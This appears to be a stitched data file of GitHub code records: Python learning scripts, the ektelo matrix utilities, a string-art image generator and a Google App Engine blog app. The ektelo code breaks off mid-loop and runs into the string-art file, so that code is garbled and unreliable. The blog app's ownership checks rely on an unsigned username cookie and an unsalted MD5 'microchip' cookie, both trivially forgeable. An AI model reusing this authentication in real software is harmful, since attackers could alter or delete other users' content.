o número não for nem maior e nem igual a 0. Ele é negativo\r\n print(\"O número digitado é Negativo.\")\r\n\r\n#Leonardo Ribeiro Leonardi\r\n#Descobrir se o número digitado é positivo ou negativo.\r\n#07/05/2019","repo_name":"leonardo99i/MyCodes","sub_path":"Positivo ou Negativo.py","file_name":"Positivo ou Negativo.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7757589635","text":"from __future__ import division\nfrom builtins import zip\nfrom ektelo import util\nfrom ektelo.matrix import EkteloMatrix\nfrom functools import reduce\nimport math\nimport numpy as np\nfrom scipy import sparse\nfrom ektelo import workload\n\ndef cantor_pairing(a, b):\n \"\"\"\n A function returning a unique positive integer for every pair (a,b) of positive integers\n \"\"\"\n return (a+b)*(a+b+1)/2 + b\n \ndef _replace(vector, new_values):\n for i in range(len(vector)):\n vector[i] = new_values[ vector[i] ]\n return vector\n\ndef get_partition_vec(rank,n,cluster,closeRange=False):\n \"\"\" get the partition vector from clusters returned by partition algorithms\n rank: If the bins are sorted, give the rank of each item in the input list.\n Used by AHP partition. Set rank = None if not used.\n n: Length of vector in original domain\n cluster: Cluster/partition returned by partition algorithms\n closeRange: if set to True, ranges in clusters are close range. (DAWA partition)\n i.e. [a,b] indicates [a,a+1,...b-1,b]\n if set to False, ranges in clusters are default python representation. (AHP partition)\n i.e. [a,b] indicates [a,a+1,...b-1]\n \"\"\"\n partition_vec_sorted = np.empty(n,int)\n assert cluster[0][0] == 0,\"First bin of partition must start with 0\"\n # assign groupID to elements in sorted list.\n for i in range(len(cluster)):\n if closeRange:\n assert cluster[-1][1] == n-1, \" Last bin of partition must end with length of original data\"\n partition_vec_sorted[cluster[i][0]:cluster[i][1]+1] = i\n else:\n assert cluster[-1][1] == n, \" Last bin of partition must end with length of original data\"\n partition_vec_sorted[cluster[i][0]:cluster[i][1]] = i\n # get index in sorted list for elements in original domain, then get groupID.\n if rank is None:\n partition_vec = partition_vec_sorted\n else:\n partition_vec = np.array([partition_vec_sorted[rank[i]] for i in range(n)] )\n\n return partition_vec\n\n\ndef update_corners(corner, groupID, row, start, end):\n ''' helper function for get_subdomain\n update corners coordinates for a certain group.\n return False if the domain is not rectangular\n '''\n # if it is the first ocurrence of the group\n # update the upper left and upper right corner\n if groupID not in corner:\n corner[groupID] = {'ul':(row, start),'ur':(row,end), 'll':(row, start),'lr':(row,end)}\n else:\n temp = corner[groupID]\n if row == temp['ll'][0]: # incontinous group on the upper line\n return False \n\n # update the lower corners\n # make sure the columns match and rows are continous.\n if temp['ll'][1] == start and temp['lr'][1] == end and temp['ll'][0] == row-1:\n # move the lower corners one line lower\n corner[groupID]['ll'] = (temp['ll'][0]+1, temp['ll'][1])\n corner[groupID]['lr'] = (temp['lr'][0]+1, temp['lr'][1])\n else:\n return False\n\n return True\n\n\n\ndef get_subdomain_grid(mapping, domain_shape):\n '''\n Given a mapping, return the domain size of all the subdomain when it is \n used by the SplitByPartition operator.\n The original domain needs to be 2D and the mapping should split the domain \n to smaller grids. Non-rectangular subdomain shapes are not supported,\n None will be returned.\n\n '''\n assert len(domain_shape) == 2 , 'Only works for 2D domains'\n m, n = domain_shape\n # unflatten the mapping vector\n mapping = mapping.reshape(domain_shape)\n corners = {}\n # record corners of each group in one pass of the mapping vector\n for i in range(m):\n start = 0\n for j in range(n):\n if j+1 >= n or mapping[i][j] != mapping[i][j+1]:\n groupID = mapping[i][start]\n status = update_corners(corners, groupID, i, start, j)\n start = j+1\n if status == False:\n return None\n\n # calculate subdomains from corners\n sub_domains = {}\n for g in corners:\n temp = corners[g]\n sub_domains[g] = (temp['ll'][0] - temp['ul'][0] + 1, temp['ur'][1] - temp['ul'][1] + 1)\n\n return sub_domains\n\n\ndef canonical_ordering(mapping):\n \"\"\" remap according to the canonical order.\n if bins are noncontiguous, use position of first occurrence.\n e.g. [3,4,1,1] => [1,2,3,3]; [3,4,1,1,0,1]=>[0,1,2,2,3,2]\n \"\"\"\n unique, indices, inverse, counts = mapping_statistics(mapping)\n\n uniqueInverse, indexInverse = np.unique(inverse,return_index =True)\n\n indexInverse.sort()\n newIndex = inverse[indexInverse]\n tups = list(zip(uniqueInverse, newIndex)) \n tups.sort(key=lambda x: x[1])\n u = np.array( [u for (u,i) in tups] )\n mapping = u[inverse].reshape(mapping.shape)\n\n return mapping\n\n\ndef mapping_statistics(mapping):\n return np.unique(mapping, return_index=True, return_inverse=True, return_counts=True) \n\n\n\n\ndef reduction_matrix(mapping, canonical_order=False):\n \"\"\" Returns an m x n matrix R where n is the dimension of \n the original data and m is the dimension of the reduced data.\n\n Reduces data vector x with R x\n Expands workload matrix W with W' R\n \"\"\"\n assert mapping.ndim == 1, \"Can only handle 1-dimesional mappings for now, domain should be flattened\"\n\n unique, indices, inverse, counts = mapping_statistics(mapping)\n\n if canonical_order:\n mapping = canonical_ordering(mapping)\n\n n = mapping.size\n m = unique.size\n data = np.ones(n)\n cols = np.arange(n)\n rows = inverse\n\n return EkteloMatrix(sparse.csr_matrix((data, (rows, cols)), shape=(m, n), dtype=int))\n\ndef expansion_matrix(mapping, canonical_order=False):\n \"\"\" Returns an n x m matrix E where n is the dimension of \n the original data and m is the dimension of the reduced data.\n\n Expands data vector x with E x'\n Reduces workload matrix W with W E\n \"\"\"\n assert mapping.ndim == 1, \"Can only handle 1-dimesional mappings for now, domain should be flattened\"\n\n unique, indices, inverse, counts = mapping_statistics(mapping)\n\n if canonical_order:\n mapping = canonical_ordering(mapping)\n\n n = mapping.size\n m = unique.size\n data = np.ones(n)\n cols = np.arange(n)\n rows = inverse\n\n R = sparse.csr_matrix((data, (rows, cols)), shape=(m, n), dtype=int)\n scale = sparse.spdiags(1.0 /counts, 0, m, m)\n\n return EkteloMatrix(R.T * scale)\n\ndef projection_matrix(mapping, idx):\n \"\"\" Returns m x n matrix P where n is the dimension of the \n original data and m is the number of occurence of idx\n in mapping.\n\n :param mapping: vector with indices representing groups\n :param idx: index of group from which to create projection\n\n Projects vector x with P x and matrix W with W P^T\n Unprojects vector x with P^T x and matrix W with W P\n \"\"\"\n mask = np.ma.masked_where(mapping!=idx, mapping).mask\n\n if np.all(~mask): # when all entries are False, a single False will be returned\n mask = np.array([False]*len(mapping))\n\n cols = np.where(~mask)[0]\n rows = np.arange(cols.size)\n vals = np.ones_like(rows)\n P = sparse.csr_matrix((vals, (rows, cols)), (rows.size, mask.size))\n\n return EkteloMatrix(P)\n\ndef combine(p1, p2):\n \"\"\" Returns p3, an (n+m) dimensional array of integers such that\n p3[i,j] = p3[i', j'] iff p1[i] = p1[i'] and p2[j] = p2[j']\n\n :param p1: an n dimensional array of integers\n :param p2: an m dimensional array of integers\n \"\"\"\n _, i1 = np.unique(p1.flatten(), return_inverse=True)\n _, i2 = np.unique(p2.flatten(), return_inverse=True)\n lookup = np.arange(i1.size * i2.size).reshape(i1.size, i2.size)\n # note: cartesian product, but order is very important\n # this order works when flattening/reshaping is done in row-major form\n pairs = np.dstack(np.meshgrid(i1, i2, indexing='ij')).reshape(-1,2)\n flat = lookup[pairs[:,0], pairs[:,1]]\n\n return flat.reshape(p1.shape + p2.shape)\n\n\ndef combine_all(mappings):\n \"\"\" Returns an ndarray with each dimension corresponding to one\n of mapping.\n \"\"\"\n return reduce(combine, mappings, np.ones((), dtype=int))\n\n\ndef extract_M(W):\n assert type(W) is sparse.csr_matrix, 'W must by csr_sparse'\n\n return W.getrow(W.nonzero()[0][0])\n\n\ndef complement(A, grid_size=None):\n '''return the queries on the complementary domain\n :param grid_size: The griding size of the new queris, if None, return total on the complementary domain\n Currently complementary domain are those indices with column norm(L1) 0.\n '''\n comp = []\n if isinstance(A, np.ndarray) is False:\n A = A.toarray()\n norm = np.linalg.norm(A,ord = 1,axis = 0)\n\n compl_size = len(norm) - np.count_nonzero(norm)\n grid_size = compl_size if grid_size is None else grid_size\n grid_num = int(math.ceil(compl_size/float(grid_size)))\n if grid_num==0:\n return None\n\n ind = 0\n for g in range(grid_num):\n q = np.zeros(len(norm))\n remain_in_group = grid_size\n while (remain_in_group>0) and (ind1, 1->2, 2->5 ... | True: 0->1, 0->2, 0->5, ...\n# End of settings\n\nImagePath = f\"./img/{input('Image: ')}\"\nImagePath += \".jpg\" if os.path.exists(ImagePath + \".jpg\") else \".png\"\noriginalImage = (\n Image.open(ImagePath)\n .resize((Size, Size))\n .convert(\"L\"))\n\noriginalImageArray = np.array(originalImage)\ncurrentImageArray = np.zeros((Size, Size), np.uint8)\n\nif livePreview:\n import pygame\n originalImage = pygame.image.frombytes(\n Image.open(ImagePath).resize((Size, Size)).convert(\"RGB\").tobytes(),\n (Size, Size),\n \"RGB\")\n WIN = pygame.display.set_mode((Size * 2, Size)) \n pygame.display.set_caption(f\"String Art - {ImagePath}\") \n WIN.blit(originalImage, (0, 0))\n pygame.display.update()\n\nskipIfBadLine = skipIfBadLine and not structured\nrun = True\nnails = [\n (\n int(Size / 2 + (Size / 2 - 10) * math.cos(2 * math.pi * i / Dots)),\n int(Size / 2 + (Size / 2 - 10) * math.sin(2 * math.pi * i / Dots)),\n ) for i in range(Dots)]\n\ndef bresenham(x0, y0, x1, y1):\n img = np.zeros((Size, Size), dtype=bool)\n dx = x1 - x0\n dy = y1 - y0\n xsign = 1 if dx > 0 else -1\n ysign = 1 if dy > 0 else -1\n dx, dy = abs(dx), abs(dy)\n if dx > dy:\n xx, xy, yx, yy = xsign, 0, 0, ysign\n else:\n dx, dy = dy, dx\n xx, xy, yx, yy = 0, ysign, xsign, 0\n D, y = 2 * dy - dx, 0\n for x in range(dx + 1):\n img[y0 + x * xy + y * yy][x0 + x * xx + y * yx] = True\n D += 2 * dy\n if D >= 0:\n y += 1\n D -= 2 * dx\n return (Color * img).astype(np.uint8)\n\ndef drawLine(start, end):\n return np.maximum.reduce([currentImageArray, (currentImageArray + bresenham(*nails[start], *nails[end]))]).clip(0, 255)\n\n\ndef difference(start, end):\n return cv2.norm(\n drawLine(start, end),\n originalImageArray,\n cv2.NORM_L2\n )\n\ndef findBest(origin):\n best = None\n i = 0\n while i < Dots:\n if i != origin:\n diff = difference(origin, i)\n if best == None or diff < best[2]:\n best = (origin,i,diff,)\n elif skipIfBadLine: i += int((Dots * 0.05) * random.random())\n i += 1\n return best\n\ndef update():\n if not livePreview: return\n current = pygame.image.frombytes(Image.fromarray(currentImageArray).convert(\"RGB\").tobytes(), (Size, Size), \"RGB\")\n WIN.blit(current, (Size, 0))\n pygame.draw.line(WIN, (255, 255, 255), (Size, 0), (Size, Size))\n pygame.display.update((Size, 0, Size * 2, Size))\n\ndef events():\n if not livePreview: return\n global run\n for e in pygame.event.get():\n if e.type == pygame.QUIT: run = False\n\ndef main():\n global currentImageArray, run\n startNail = 0\n currentNail = (random.randint(0, Dots - 1) if continuousLine else startNail)\n history = [(currentNail, currentNail)]\n startTime = time.time()\n diff = 0\n lastDiff = math.inf\n disconnects = 0\n fullLoop = False\n\n def stats():\n os.system(\"cls\")\n print(\n tabulate(\n headers=[\"statistic\", \"value\"],\n tabular_data=[\n [\"Time elapsed\",time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - startTime)),],\n [\"Connections made\", len(history)],\n [\"\", \"\"],\n [\"Time per Line\", f\"{(time.time() - startTime) / len(history):.4f}s\",],\n [\"Similarity Score\", f\"{diff:.4f}\"],\n [\"Improvement\", f\"{(diff - lastDiff):.4f}\"],\n [\"Current Start\", startNail if not continuousLine else \"N/A\"],\n [\"Disconnects\", disconnects if not continuousLine else \"N/A\"],\n [\"Continuous Line\",continuousLine if not continuousLine else \"N/A\",],\n [\"\", \"\"],\n [\"image\", ImagePath],\n [\"dots\", Dots],\n [\"size\", Size],\n [\"color\", Color],\n ],\n tablefmt=\"rounded_outline\",\n )\n )\n\n def save():\n savePath = f\"./results/{time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime())}/\"\n os.makedirs(savePath) \n Image.fromarray(currentImageArray).convert(\"RGB\").save(savePath + \"result.png\")\n with open(savePath + \"history.json\", \"w\") as f:\n json.dump(history, f)\n with open(savePath + \"stats.json\", \"w\") as f:\n json.dump(\n {\n \"Time elapsed\": time.strftime(\n \"%H:%M:%S\", time.gmtime(time.time() - startTime)\n ),\n \"Connections made\": len(history),\n \"Time per Line\": f\"{(time.time() - startTime) / len(history):.4f}s\",\n \"Similarity Score\": f\"{diff:.4f}\",\n \"Improvement\": f\"{(diff - lastDiff):.4f}\",\n \"Current Start\": startNail,\n \"Disconnects\": disconnects,\n \"continuousLine\": continuousLine,\n \"image\": ImagePath,\n \"dots\": Dots,\n \"size\": Size,\n \"color\": Color,\n },\n f,\n indent=4,\n )\n\n update()\n stats()\n events()\n\n while run:\n currentNail, endNail, diff = findBest(currentNail)\n if (diff - lastDiff) < 0:\n currentImageArray = drawLine(currentNail, endNail)\n history.append((currentNail, endNail))\n currentNail = endNail\n\n elif (diff - lastDiff) >= 0 or structured:\n if not continuousLine:\n disconnects += 1\n startNail += 1\n if (startNail >= Dots):\n startNail = 0\n if fullLoop: run = False\n else: fullLoop = True\n currentNail = startNail\n else: run = False\n \n elif continuousLine: fullLoop = False\n if len(history) % 100 == 0 or len(history) < 100:\n update()\n stats()\n events()\n \n lastDiff = diff\n\n update()\n stats()\n if saveIt:\n save()\nmain()","repo_name":"flloschy/Jams","sub_path":"StringArt/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70652600441","text":"#Dictionaries bestehen aus Key-/Valuepaaren. Dictionaries sind geordnet, veränderbar und erlauben keine Duplikate.\n\n#Zugriff mit Hilfe der Keys\na = {\n \"eins\" : 1,\n \"zwei\" : 2,\n \"drei\" : 3\n}\nprint(a)\nprint(a[\"drei\"])\n\n#Anzeige aller Keys der Dictionary mit keys-Methode\nx = a.keys()\nprint(x)\n\n#Zuweisung neues Key-/Valuepaar. Es kann bereits vorhanden Keys neue Values zugewiesen werden.\na[\"vier\"] = 4\nprint(a)\n\n#Anzeige aller Values mit values-Methode\ny = a.values()\nprint(y)\n\n#Abbildung aller Key-/Valuepaare als Tuples in einer Liste\nz = a.items()\nprint(z)\n\n#Zuweisung neues Key-/Valuepaar oder Zuweisung an einem bereits vorhanden Key mit update-Methode\nb = {\"Steve\": \"Jobs\", \"Elon\" : \"Musk\"}\na.update(b)\nprint(a)","repo_name":"eemsar/PythonUnterlagen","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37916866336","text":"import os\nimport re\nfrom string import letters\nimport webapp2\nimport jinja2\nimport json\n\n# random, string, hashlib used for salted hashed password generation\nimport random\nimport string\nimport hashlib\n\nimport time\n\n# TODO\n# time library is to create short delay before reloading to compensate for\n# eventual consistency. This is a temporary fix until\n# I can better understand ancestor queries\n\n\nfrom google.appengine.ext import db\n\nfrom models import User, Wags, Comments, Post, render_str\n\n\ndef users_key(group = \"default\"):\n return db.Key.from_path(\"users\", group)\n\nclass AddWag(webapp2.RequestHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n wagged_user = self.request.cookies.get(\"current_user\")\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n data = json.loads(self.request.body)\n post_to_wag = Post.get_by_id(int(data['storyKey']), parent = blog_key())\n # post_to_wag = Post.Key(Post, data['storyKey']).get()\n p = Wags(parent = blog_key(), wagged_user = wagged_user,\n wagged_post = data['storyKey'])\n p.put()\n\n # updates wag field.\n current_wags = post_to_wag.wags\n new_wags = current_wags + 1\n post_to_wag.wags = new_wags\n post_to_wag.put()\n self.response.out.write(json.dumps({'posts': {'wags': new_wags, 'storyKey': int(data['storyKey'])}}))\n else:\n self.redirect(\"/blog/login\")\n\n\nclass RemoveWag(webapp2.RequestHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n data = json.loads(self.request.body)\n unwagged_user = self.request.cookies.get(\"current_user\")\n unwagged_post = data['postKey']\n # unwagged user also gets the logged in user\n if unwagged_user:\n unwag = db.GqlQuery(\"SELECT * from Wags WHERE wagged_post = :1 \"\n + \"AND wagged_user = :2\", unwagged_post, unwagged_user)\n db.delete(unwag)\n post_to_unwag = Post.get_by_id(int(data['postKey']), parent = blog_key())\n current_wags = post_to_unwag.wags\n new_wags = (current_wags - 1)\n post_to_unwag.wags = new_wags\n post_to_unwag.put()\n self.response.out.write(json.dumps({'posts': {'wags': new_wags, 'postKey': int(data['postKey'])}}))\n else:\n self.redirect(\"/blog/login\")\n\n\nclass DeletePost(webapp2.RequestHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n user_who_deleted = self.request.cookies.get(\"current_user\")\n post_to_delete = self.request.get(\"post_key\")\n micro_check = self.request.cookies.get(\"microchip\")\n delete_record = Post.get_by_id(int(post_to_delete),\n parent = blog_key())\n post_poster = make_microchip_hash(delete_record.poster)\n # user_who_deleted gets the current logged in user\n if micro_check == post_poster:\n db.delete(delete_record)\n delete_related_comments=db.GqlQuery(\"SELECT * from Comments WHERE \"\n + \"comment_post = :1\", post_to_delete)\n db.delete(delete_related_comments)\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\nclass DeleteComment(webapp2.RequestHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n user_who_deleted = self.request.cookies.get(\"current_user\")\n comment_to_delete = self.request.get(\"comment_key\")\n current_post = self.request.get(\"post_key\")\n micro_check = self.request.cookies.get(\"microchip\")\n delete_record = Comments.get_by_id(int(comment_to_delete),\n parent = blog_key())\n comment_poster = make_microchip_hash(delete_record.comment_user)\n # user_who_deleted gets the current logged in user\n if micro_check == comment_poster:\n db.delete(delete_record)\n self.redirect(\"/blog/\" + current_post)\n else:\n self.redirect(\"/blog/login\")\n\n# generate random string for password\ndef make_salt(length = 5):\n return \"\".join(random.choice(string.lowercase) for i in range(length))\n\ndef make_microchip_hash(s):\n hm = hash_str(s)\n return hm\n\ndef make_pw_hash(username, password, salt = None):\n if not salt:\n salt = make_salt()\n h = hashlib.sha256(username + password + salt).hexdigest()\n return \"%s|%s\" % (h, salt)\n\ndef valid_pw(name, pw, h):\n salt = h.split(\"|\")[1]\n return h == make_pw_hash(name, pw, salt)\n\n# functions for cookies and hashing\ndef hash_str(s):\n return hashlib.md5(s).hexdigest()\n\ndef make_secure_val(s):\n return \"%s|%s\" % (s, hash_str(s))\n\ndef check_secure_val(hs):\n val = hs.split(\"|\")[0]\n if hs == make_secure_val(val):\n return val\n\nclass BlogHandler(webapp2.RequestHandler):\n def write(self, *a, **kw):\n self.response.out.write(*a, **kw)\n\n def render_str(self, template, **params):\n params[\"user\"] = self.request.get(\"username\")\n params[\"current_user\"] = self.request.cookies.get(\"current_user\")\n params[\"comment\"] = self.request.get(\"comment\")\n return render_str(template, **params)\n\n def render(self, template, **kw):\n self.write(self.render_str(template, **kw))\n\n def set_secure_cookie(self, name, val):\n cookie_val = make_secure_val(val)\n self.response.headers.add_header(\n \"Set-Cookie\",\n \"%s = %s; Path = /\" % (name,cookie_val))\n\n def login(self, user):\n self.set_secure_cookie(\"user_id\", str(user.key().id()))\n\ndef render_post(response, post):\n response.out.write(\"\" + post.subject + \"
    \")\n response.out.write(post.content)\n response.out.write(post.poster)\n\nclass MainPage(BlogHandler):\n def get(self):\n self.redirect(\"/blog\")\n\n# set blog key in case we decide to have additional blogs\ndef blog_key(name = \"default\"):\n return db.Key.from_path(\"blogs\", name)\n\n# front page of blog at /blog, display 10 latest posts\nclass BlogFront(BlogHandler):\n def get(self):\n posts = Post.all().order('-created')\n front_page=1\n logged_in = self.request.cookies.get(\"current_user\")\n current_user = self.request.cookies.get(\"current_user\")\n user_wags = db.GqlQuery(\"SELECT wagged_post from Wags WHERE \"\n + \"wagged_user = :1\", current_user)\n myList = []\n for u in user_wags:\n myList.append(u.wagged_post)\n time.sleep(0.2)\n self.render(\"front.html\", posts = posts, logged_in = logged_in,\n current_user = current_user, myList = myList,\n front_page = front_page)\n\nclass EditPost(BlogHandler):\n def get(self):\n poster = self.request.get(\"poster\")\n post_to_edit = self.request.get(\"post_key\")\n subject = self.request.get(\"subject\")\n content = self.request.get(\"content\")\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in == poster:\n if post_to_edit:\n self.render(\"editpost.html\", subject = subject, content = content,\n poster = poster, post_to_edit = post_to_edit, newpost_page = 1,\n logged_in = logged_in)\n else:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n poster = self.request.get(\"poster\")\n post_to_edit = self.request.get(\"post_key\")\n subject = self.request.get(\"subject\")\n content = self.request.get(\"content\")\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in == poster:\n self.render(\"editpost.html\", subject = subject, content = content,\n poster = poster, post_to_edit = post_to_edit, newpost_page = 1,\n logged_in = logged_in)\n else:\n self.redirect(\"/login\")\n\nclass AddComment(BlogHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n comment_user = self.request.cookies.get(\"current_user\")\n comment_post = self.request.get(\"post_key\")\n comment_text = self.request.get(\"comment\")\n # comment_user also contains logged in user info\n if comment_user:\n if comment_text:\n c = Comments(parent = blog_key(), comment_user = comment_user,\n comment_post = comment_post, comment_text=comment_text)\n c.put()\n self.redirect(\"/blog/\" + comment_post)\n else:\n #TODO: add error if no text added\n self.redirect(\"/blog/\" + comment_post + \"?comment=True\")\n else:\n self.redirect(\"/blog/login\")\n\n\nclass EditComment(BlogHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n current_user = self.request.cookies.get(\"current_user\")\n current_post = self.request.get(\"post_key\")\n comment_to_edit = self.request.get(\"comment_key\")\n comment_text = self.request.get(\"comment_text\")\n micro_check = self.request.cookies.get(\"microchip\")\n edit_record = Comments.get_by_id(int(comment_to_edit),\n parent = blog_key())\n post_owner = make_microchip_hash(edit_record.comment_user)\n # current_user contains login info\n if micro_check == post_owner:\n self.render(\"editcomment.html\", current_user = current_user,\n current_post = current_post, comment_to_edit = comment_to_edit,\n comment_text = comment_text)\n else:\n self.redirect(\"/blog/login\")\n\nclass SaveComment(BlogHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n current_user = self.request.cookies.get(\"current_user\")\n current_post = self.request.get(\"post_key\")\n comment_to_edit=self.request.get(\"comment_key\")\n comment_text = self.request.get(\"comment\")\n micro_check = self.request.cookies.get(\"microchip\")\n edit_record = Comments.get_by_id(int(comment_to_edit),\n parent = blog_key())\n comment_owner = make_microchip_hash(edit_record.comment_user)\n # current_user contains login info\n if micro_check == comment_owner:\n if comment_to_edit:\n if comment_text:\n edit_record.comment_text = comment_text\n edit_record.put()\n self.redirect(\"/blog/\" + current_post)\n else:\n error = \"Please enter the comment.\"\n self.render(\"editcomment.html\", current_user = current_user,\n current_post = current_post,\n comment_to_edit = comment_to_edit,\n error = error, comment_text = comment_text)\n else:\n self.redirect(\"blog/\" + post_key)\n else:\n self.redirect(\"blog/login\")\n\n\nclass WelcomeRedirect(webapp2.RequestHandler):\n def get(self):\n self.redirect(\"/blog/signup\")\n\n# get the selected post from the current blog\nclass PostPage(BlogHandler):\n def get(self, post_id):\n key = db.Key.from_path(\"Post\", int(post_id), parent = blog_key())\n post = db.get(key)\n logged_in = self.request.cookies.get(\"current_user\")\n comments_to_show = db.GqlQuery(\"SELECT * from Comments WHERE \"\n + \"comment_post = :1 ORDER BY created ASC\", post_id)\n comment_list_count = comments_to_show.count()\n if comment_list_count >= 1:\n comment_list = comments_to_show\n else:\n comment_list = \"No Comments\"\n if not post:\n self.error(404)\n return\n time.sleep(0.2)\n self.render(\"permalink.html\", post = post, comment_list = comment_list,\n permalink_page = 1, logged_in = logged_in)\n\n\n# pertaining to creating a new post\nclass NewPost(BlogHandler):\n def get(self):\n poster = self.request.get(\"poster\")\n logged_in = self.request.get(\"logged_in\")\n if logged_in:\n self.render(\"newpost.html\", poster = poster, newpost_page = 1,\n logged_in = logged_in)\n else:\n self.redirect(\"/blog/login\")\n\n\n def post(self):\n poster = self.request.get(\"poster\")\n subject = self.request.get(\"subject\")\n content = self.request.get(\"content\")\n # post_to_edit variable is in case it is an edit, will be blank if new post\n # otherwise, the inputs will fill with the values of the post\n post_to_edit = self.request.get(\"post_key\")\n logged_in = self.request.cookies.get(\"current_user\")\n micro_check = self.request.cookies.get(\"microchip\")\n if post_to_edit:\n edit_record = Post.get_by_id(int(post_to_edit),\n parent = blog_key())\n post_poster = make_microchip_hash(edit_record.poster)\n if micro_check == post_poster:\n if subject and content:\n edit_record.subject = subject\n edit_record.content = content\n edit_record.put()\n self.redirect(\"/blog/\" + post_to_edit)\n else:\n error = \"Please enter both a subject and content.\"\n self.render(\"editpost.html\", subject = subject,\n content = content, poster = poster, error = error,\n post_to_edit = post_to_edit, logged_in = logged_in)\n else:\n self.redirect(\"/blog/login\")\n else:\n if subject and content:\n p = Post(parent = blog_key(), subject = subject,\n content = content, poster = poster)\n p.put()\n self.redirect(\"/blog/%s\" % str(p.key().id()))\n else:\n error = \"Please enter both a subject and content.\"\n self.render(\"newpost.html\", subject = subject,\n content = content, poster = poster,\n error = error, logged_in = logged_in)\n\n\n# functions to validate username, password, and email\nUSER_RE = re.compile(r\"^[a-zA-Z0-9_-]{3,20}$\")\ndef valid_username(username):\n return username and USER_RE.match(username)\n\nPASS_RE = re.compile(r\"^.{3,20}$\")\ndef valid_password(password):\n return password and PASS_RE.match(password)\n\nEMAIL_RE = re.compile(r'^[\\S]+@[\\S]+\\.[\\S]+$')\ndef valid_email(email):\n return not email or EMAIL_RE.match(email)\n\n# check to see if the user is already in the database\n# query the users table, count the results and if there is a result return error\ndef new_user(username):\n user = User.all().filter(\"username = \", username)\n result = user.count()\n return result\n\n# checks for a matching username/password pair. Should return 0\n# if no match or 1 if there is a match. Then check the hash of the username and\n# password against the hash plus salt in the db\ndef get_pw_val(username,password):\n result = 0\n user = User.all().filter(\"username = \", username)\n result = user.count()\n if result == 1:\n for p in user.run(limit=1):\n h = p.pw_hash\n return valid_pw(username, password, h)\n else:\n return False\n\n# pertaining to sign up functionality\nclass Signup(BlogHandler):\n def get(self):\n self.render(\"signup.html\", sign_page = 1)\n\n # after user enters sign up info, verify valid input\n def post(self):\n have_error = False\n self.username = self.request.get(\"username\")\n self.password = self.request.get(\"password\")\n self.verify = self.request.get(\"verify\")\n self.email = self.request.get(\"email\")\n\n params = dict(username = self.username,\n email = self.email)\n\n if not valid_username(self.username):\n params[\"error_username\"] = \"That's not a valid username.\"\n have_error = True\n elif new_user(self.username) >= 1:\n params[\"error_username\"] = \"That user already exists.\"\n have_error = True\n\n if not valid_password(self.password):\n params[\"error_password\"] = \"That wasn't a valid password.\"\n have_error = True\n elif self.password != self.verify:\n params[\"error_verify\"] = \"Your passwords didn't match.\"\n have_error = True\n\n if not valid_email(self.email):\n params[\"error_email\"] = \"That's not a valid email.\"\n have_error = True\n\n if have_error:\n self.render(\"signup.html\", **params)\n else:\n pw_hash = make_pw_hash(self.username,self.password)\n u = User(pw_hash = pw_hash, username = self.username,\n email = self.email)\n u.put()\n self.login(u)\n self.response.headers.add_header(\"Set-Cookie\",\n \"%s = %s; Path = /\" % (\"current_user\", str(self.username)))\n self.response.headers.add_header(\"Set-Cookie\",\n \"%s = %s; Path = /\" % (\"microchip\", str(make_microchip_hash(self.username))))\n logged_in = self.username\n referred = 1\n self.render(\"welcome.html\", username = self.username,\n referred = referred, logged_in = logged_in)\n\nclass Login(BlogHandler):\n def get(self):\n self.render(\"login.html\", log_page = 1)\n def post(self):\n have_error = False\n username = self.request.get(\"username\")\n password = self.request.get(\"password\")\n\n params = dict(username = username,\n password = password)\n\n if new_user(username) != 1:\n params[\"error_username\"] = \"That user doesn't have an account.\"\n have_error = True\n\n if have_error:\n self.render(\"login.html\", **params)\n else:\n pass_check_result = get_pw_val(username,password)\n if pass_check_result == True:\n user = User.all().filter(\"username = \", username).get()\n my_key = str(user.key().id())\n self.set_secure_cookie(\"user_id\", my_key)\n this_user = str(username)\n self.response.headers.add_header(\n \"Set-Cookie\",\n \"%s = %s; Path= /\" % (\"current_user\", this_user))\n self.response.headers.add_header(\n \"Set-Cookie\",\n \"%s = %s; Path= /\" % (\"microchip\", make_microchip_hash(this_user)))\n logged_in = this_user\n referred = 2\n self.render(\"welcome.html\", username = username,\n referred = referred, welcome_page = 1, logged_in = logged_in)\n else:\n params['error_password'] = \"Please check your password.\"\n have_error = True\n self.render(\"login.html\", **params)\n\nclass Logout(BlogHandler):\n def get(self):\n self.response.headers.add_header(\"Set-Cookie\",\n \"user_id=; Path=/\")\n self.response.headers.add_header(\"Set-Cookie\",\n \"current_user=; Path=/\")\n self.response.headers.add_header(\"Set-Cookie\",\n \"microchip=; Path=/\")\n 